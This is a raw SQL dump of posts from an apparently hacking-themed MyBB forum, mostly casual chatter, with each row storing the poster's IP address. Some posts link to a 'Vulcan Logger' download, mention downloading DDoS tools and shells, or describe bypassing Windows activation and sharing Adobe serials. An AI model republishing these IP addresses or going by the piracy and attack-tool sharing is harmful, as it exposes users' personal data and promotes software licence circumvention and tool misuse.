[url=http://www.mediafire.com/?08cqcy82htoc4k3][img]http://img254.imageshack.us/img254/9947/downloadnow.png[/img][/url] Official Download Page: http://vulcantools.net/index.php?mod=survey_tools&tool=Vulcan_Logger [/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ede7589b96ac5da8a4808a792e8165f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3301', '487', '2354', '56', 'RE: Corrupt a wish', '0', '3', '??????????¢™', '1349324903', 'Wish Granted, but you died in a car accident and now you cant protect anyone. I wish I had a domain name and hosting so I could make a forum and partner with LH.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'f370261cdabb36c85692340ccb87ed50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3302', '654', '3226', '9', 'RE: Make money typing captchas', '0', '3', '??????????¢™', '1349325013', 'How much could you get from doing this. BTW I have seen this somewhere but I dont remember if it was here or on another forum.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '4b0bc541e3d212490866fa174665fcdd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3303', '661', '0', '50', 'Bullshit', '0', '3', '??????????¢™', '1349325207', '[b]I am making this complaint because I got removed from staff for nothing. Maybe its because I didnt post (because I wasnt home) or something. Well JakeUS who is a Mod didnt get removed from his position and I havent seen him post since I got here. Tell me why. COMPLETE BS.[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '84a487636cb0ec4edbc67392b5c7ee0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3304', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '3', '??????????¢™', '1349325377', 'I have never heard of it but this forum is probably much more better than that. You should make this your home.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8d36b01f92fd8752cb240c489dd2ebcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3305', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '3', '??????????¢™', '1349325440', 'FUCK THE POLICE OR WHATEVER, I STILL USE GOOGLE FOR EVERYTHING.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '5cda3361de2ce70caece6c54e4b6a8fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3306', '662', '0', '7', 'Is this how you treat me?', '0', '3', '??????????¢™', '1349325643', '[b]Okay so today I get on to make posts and guess what, I am not staff anymore. Hmm maybe its because I didnt post for 1 fucking day (because I wasnt here) or something. May I ask why is JakeUS still a Mod and I havent seen him make 1 post since I came back. I got one question, Is this how you treat an original admin/member? This is complete BBSSSSSSSSS.[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '054edb5a47d085b55dd34336feee148b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3307', '622', '3249', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349325808', '[quote=\'mothered\' pid=\'3249\' dateline=\'1349269033\'] Isn\'t he the one who has since declared himself bankrupt? The Pirate Bay has been down for a few days now (still Is at the time of this post). Google It and read the news. It\'s quite Interesting. [/quote] The Pirate bay is not down for me, I am in the US. http://thepiratebay.se/', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '05986846530956ae52effb53fd7a2ec1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3308', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '3', '??????????¢™', '1349325897', 'If I had the money to I would but I dont have money for that.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '56211eef36c230eee7193be9ca605a5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3309', '607', '2942', '7', 'RE: Wanna laugh?', '0', '3', '??????????¢™', '1349325990', 'I header all these jokes a while ago. Sorry to say OP but these are old.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '1337105b7b261e43d75734e744805dec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3310', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '205', 'mothered', '1349326521', 'Just want to say thanks for providing the code. Much appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '65652d529386aa55c724787d55ccaef6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3311', '643', '3304', '7', 'RE: L33thakcers.com members here?', '0', '205', 'mothered', '1349326702', '[quote=\'??????????¢™\' pid=\'3304\' dateline=\'1349325377\'] I have never heard of it but this forum is probably much more better than that. You should make this your home. [/quote] I fully agree. This forum Is certainly better, hence one of many reasons why I choose to hang out here.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '49dd1d5d054f5a7e214c83faf9495031', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3312', '654', '3226', '9', 'RE: Make money typing captchas', '0', '205', 'mothered', '1349326840', 'I didn\'t know this methodology existed to make money online. What sort of payments are we looking at?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '687709e06b74d20256b6554478e4083e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3313', '622', '3307', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349326971', '[quote=\'??????????¢™\' pid=\'3307\' dateline=\'1349325808\'] The Pirate bay is not down for me, I am in the US. http://thepiratebay.se/ [/quote] Yeah, It was down at the time of my post yesterday. Around 3 hours before your post here, It was up and running again for everyone.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd00aa85245cf2d5fdd7403baca6245e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3314', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '205', 'mothered', '1349327133', 'Personally, I think It\'s just plain annoying. Different people acquire different tastes, hence our opinions vary.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '76031963b560497c09ccdf4560c2a726', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3315', '603', '3310', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349327180', '[quote=\'mothered\' pid=\'3310\' dateline=\'1349326521\'] Just want to say thanks for providing the code. Much appreciated. [/quote] No problem man, Just contributing to the community.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'e098a0245314859099d2cf07316f88f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3316', '659', '3293', '64', 'RE: Stolen (2012) Movie RIP', '0', '205', 'mothered', '1349327252', 'I\'ve actually heard some positive reviews on this. I do like movies of this nature. I\'m hoping to allocate time to watch It. Thanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cd26ac762d130a2d8b1e0d021ab136a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3317', '622', '3313', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349327610', '[quote=\'mothered\' pid=\'3313\' dateline=\'1349326971\'] [quote=\'??????????¢™\' pid=\'3307\' dateline=\'1349325808\'] The Pirate bay is not down for me, I am in the US. http://thepiratebay.se/ [/quote] Yeah, It was down at the time of my post yesterday. Around 3 hours before your post here, It was up and running again for everyone. [/quote] Oh okay, well it havent been down for me. I go to it everyday.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '52ebe4ad55fe9551e438ec0d2931acd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3318', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '205', 'mothered', '1349327639', 'You can download the Windows 8 Enterprise Edition (RTM), with a 90 day trial. I\'ve actually activated my Windows 8 Pro Edition, via an offline activation methodology. I believe the method Is no longer working, and has been detected by Microsoft. Mine Is still up and running nicely. I\'ll be working on an activator soon (when time permits), so It shouldn\'t be too far away. There\'s other methods to remove the \"Product ID\", thus no checks can be performed by Microsoft to render It useless. I have this method running on another lappy, and all Is well.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5da00837f0dff79e59bb76d0f2b3791b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3319', '584', '3318', '24', 'RE: Windows 8, will you switch over?', '0', '3', '??????????¢™', '1349328424', '[quote=\'mothered\' pid=\'3318\' dateline=\'1349327639\'] You can download the Windows 8 Enterprise Edition (RTM), with a 90 day trial. I\'ve actually activated my Windows 8 Pro Edition, via an offline activation methodology. I believe the method Is no longer working, and has been detected by Microsoft. Mine Is still up and running nicely. I\'ll be working on an activator soon (when time permits), so It shouldn\'t be too far away. There\'s other methods to remove the \"Product ID\", thus no checks can be performed by Microsoft to render It useless. I have this method running on another lappy, and all Is well. [/quote] I really want to get this but I want to get the full version free not a trial.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '2510117b0f13beb13d7d13a932082bdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3320', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '214', 'Rave™', '1349347214', 'Could I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '186b50a1525bd77e778f094bc3bbf1d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3321', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349351691', 'http://www.facebook.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf54f95b0c18d8ab2d2a88184ccf397b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3322', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349351732', 'Like what though ?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca9ac66ae0d28b87d21fee34cabac28d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3323', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349351763', '33. Like a boss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '21d755e8031cf8edc95fa621a523eca3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3324', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349351838', '/me thanks Romdu62 for a kind comment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2152784da73f109b579419eeb4e88c4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3325', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349351868', 'Banned for not having a @L33tHacking.net email', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a70051c865c20cb3cde5e9cf8ebe07b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3327', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349351997', 'I saw some immature posts by you. But still I don\'t know. I wasn\'t on that much yesterday. But I still posted for sure atleast 5+ posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '501f5f3ede0071250a93ee83fe4d06fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3328', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '2', 'Apathy', '1349352036', 'I would restart honestly. Needs to have the render blend more and this is WAYYYY to much empty space. Keep trying. :P', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', 'f68ff586f116e6ef282c85c526f7b872', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3329', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349352046', 'I don\'t know. I just remember I posted this thread... Not even sure now... :/ Did it get deleted?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abf65b515d8611fac6dffa775ebd79cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3330', '622', '3317', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349356153', '[quote=\'??????????¢™\' pid=\'3317\' dateline=\'1349327610\'] Oh okay, well it havent been down for me. I go to it everyday. [/quote] You couldn\'t have been on It everyday. It was definitely down. Read this: http://www.wptv.com/dpp/news/national/pirate-bay-outage-popular-torrent-website-explains-cause-of-temporary-outage-this-week', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '12e0e7cef21428d925007081648da8aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3331', '661', '3303', '50', 'RE: Bullshit', '0', '61', 'NXK', '1349360331', 'PM Jok3r about this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1e8066ca3c022e3382573dcf3dbb5373', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3332', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349362386', 'You haven\'t contributed anything at all why are you freaking out I don\'t get it. You\'ve literally done nothing.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a4d9f4afa08c7de387df442a0b3e684f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3333', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '216', 'o_o', '1349363635', 'I thought that this was the l33thackers forum thats why I registered now I just noticed that it isn\'t, I\'ll just stay here and see how it goes', '197.226.120.114', '-975013774', '0', '0', '216', '1349363740', '1', '1b7a5a2838efc3049e897120c510a6db', '0', '1349363740'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3334', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349373886', 'Oh I didn\'t know that. Updated.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '720dbf971c1ee500659d799c0ed7ce6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3336', '642', '3115', '61', 'RE: [FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '100', '??zg???g????61', '1349374287', 'Downloaded the DDoS and Shells ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'ab0396fd75459c27883803dffe4cd32c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3337', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '100', '??zg???g????61', '1349374549', 'I can confirm it was down (o_o)', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'b018e260f2bbe157c3d9fc32d909e495', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3338', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '100', '??zg???g????61', '1349374750', 'I bought this >:) I really like it xD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '969ef2bbfb6eb474ead52ef8b89f02a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3339', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '100', '??zg???g????61', '1349374812', 'Holy shit. Hes like bear grills, except he probably doesn\'t drink his own piss.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'fecf92c1ae22a605845378334140792c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3340', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '100', '??zg???g????61', '1349374958', 'I haven\'t seen you post much.. Sorry 0_0', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '63bca575b3a378ea1867b892be8bd284', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3341', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349375048', 'Banned for not using a period. ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '567c43966c3b73c1dd22a139d9910179', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3342', '652', '3263', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349375161', '[quote=\'NXK\' pid=\'3263\' dateline=\'1349303023\'] Everyones IP\'s are logged on this site It\'s public information. No one can hide. [/quote] I always use a VPN, and if for some reason my main VPN\'s server is down, I have a backup xDDD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'd7963f827d684c986dd5a4bc8a100860', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3343', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349375214', 'This makes hardly any money xDDD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a79dc20f3d914f5184fd6a1b67ac56c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3344', '487', '2354', '56', 'RE: Corrupt a wish', '0', '100', '??zg???g????61', '1349375426', 'iPod you forgot to wish for something xD I wish I lived in Australia.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a2e43e78c2da2826b08bc8312b65c4ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3345', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349375640', '34. Like a L33t Hacker ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '92ec2b89c402c42c9798d746d99c0bdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3346', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '100', '??zg???g????61', '1349375704', 'Awesome. Now we just need a shitload more traffic to reach 10,000 posts ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a501fbf0ad6462a2a50528b6a9665d19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3347', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '100', '??zg???g????61', '1349375906', 'Holy shit hahahahahahaha I hope those aren\'t all YOURS xD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'f37ad914b94d8a702195037e69e4cf1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3348', '376', '1738', '54', 'RE: ExpressVPN codes', '0', '100', '??zg???g????61', '1349376171', 'Aww none of them work ;((', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '9c90be8c8a973ef3f92535d3fa7b3470', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3349', '662', '3340', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349377006', '[quote=\'iTzGRONgamer61\' pid=\'3340\' dateline=\'1349374958\'] I haven\'t seen you post much.. Sorry 0_0 [/quote] Exactly even when he was in power he never posted.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '08980cb3de2036568a3bee8ac4a3faad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3350', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349378135', 'Can you give me more tips? Like if I restart it, then what would I do then? And no shit that there is way too much empty space... -.- That\'s why I asked if someone could help me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 